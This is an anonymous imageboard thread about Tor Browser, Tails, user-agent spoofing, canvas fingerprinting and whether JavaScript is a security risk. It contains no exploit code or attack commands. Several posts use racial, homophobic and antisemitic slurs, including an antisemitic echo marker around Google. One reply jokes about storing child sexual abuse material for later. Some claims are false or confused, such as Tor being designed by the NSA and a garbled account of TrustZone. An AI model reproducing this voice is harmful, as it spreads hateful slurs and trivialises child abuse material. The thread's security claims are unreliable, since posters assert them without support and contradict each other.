They didn't say TB8 is totally safe, retard. They said the exploit wasn't applicable to TB8. Also, spoofing of user agent does nothing. NOTHING. You can employ better techniques against someone with Javascript enabled. You can fingerprint their fucking canvas and the shitty graphics libraries will give your personal info away.

Basically JS is the root cause of all security problems. You're automatically running untrusted code you got from the network. It's completely different from the class of problems where some crafty fuck exploits a badly coded XML parser and gains access to places he shouldn't have access to.

>>1012593

How the fuck is tails compromised?

> but remember to encrypt your entire PC or whonix VM.

Fuck you're dumb. You should keep the OS image on a live USB and boot directly off of it. Don't use non-volatile storage you dumbass.

lmao just use stock google chrome with socks5 wtf u even doing on the net nigga

Uh oh, does this mean the shitpost police are going to kick in my front door?

>>1020059

5.0 (Windows)

Windows NT 6.1

Win32

(nothing found)

Netscape

(nothing found)

(no value)

(no value)

>or even better, upload your prefs.js file

I'm on TBB...I can't upload shit, nigga.

>compromised

Tor was literally designed by the NSA. Are you new?

>>1021113

it was the navy you cointelpro faggot

>>1021056

>How the fuck is tails compromised?

Systemd

>>1021190

Wait a second, why would the navy come up with something like Tor?

>>1021274

You can read up about it here

https://www.nrl.navy.mil/itd/chacs/syverson-towards-analysis-onion-routing-security

https://www.nrl.navy.mil/itd/chacs/dingledine-tor-second-generation-onion-router

>>1012911

Trustzone is the name of the ARM processor running unsigned shit on modern intel boards, you cannot conclude that ARM as an architecture is compromised because intel runs shady code on its ARM.

>>1014084

>https://techblog.willshouse.com/2012/01/03/most-common-user-agents/

helpful link but be careful with it, it takes the user agents of everyone who visits the site, but that's a rather large sampling bias because how many normalfags even know what a user agent is?

>>1012797

UUID for hard drives changes every time you format them, at least under linux it does.

>>1021056

>Tails

Use heads, systemd free tails

goddamnit qtards get off my board

>>1012230 (OP)

ju5t 4 qu|ck qu3st|0n

wh5t sh0u|d 0n3 d0 |f 0n3 5usp3ct5 th4t th3y 4r3 b31ng g@ng5t4|k3d by g|0w5 0f th3 sp00k 4nd ch053n v4r13ty?

>>1021274

Because they needed secure communications, and encryption alone doesn't hide the cause-and-effect between messages being transmitted and orders being executed.

>>1021370

It is imperative that you write all of your communications in 13375p34k...it is a well known fact that government agencies cannot decipher it.

>>1021053

>They didn't say TB8 is totally safe, retard.

they told people to upgrade to TB8

>Also, spoofing of user agent does nothing. NOTHING. You can employ better techniques against someone with Javascript enabled.

with javascript. if someone disables it then user agent is important

>You can fingerprint their fucking canvas and the shitty graphics libraries will give your personal info away.

you cannot in Tor Browser. it blocks canvas

>Basically JS is the root cause of all security problems.

yes. javascript holocaust is necessary

>>1021056

>Fuck you're dumb. You should keep the OS image on a live USB and boot directly off of it. Don't use non-volatile storage you dumbass.

fuck you're dumb. If you use read-only memory with your OS/Tails, how will you save downloaded files, webpages, your work? how will you store cp for later?

>>1021083

>lmao just use stock google chrome with socks5 wtf u even doing on the net nigga

<he doesn't know chrome will just send his browsing history and keystrokes to (((google))) servers

>>1021111

>5.0 (Windows)

>Windows NT 6.1

>Win32

>(nothing found)

>Netscape

>(nothing found)

>(no value)

>(no value)

thanks. can someone post those values but for Linux?

<or even better, upload your prefs.js file

>I'm on TBB...I can't upload shit, nigga.

upload it to anonfile.com and post link here

>>1021288

>Trustzone is the name of the ARM processor running unsigned shit on modern intel boards, you cannot conclude that ARM as an architecture is compromised because intel runs shady code on its ARM.

ARM is compromised because modern ARM cpu's also have Trustzone, just like intel/amd botnet

>UUID for hard drives changes every time you format them, at least under linux it does.

but nobody formats drives except normalfags and idiots. why would someone format drive except first time?

>>1021480

th4nk5 br0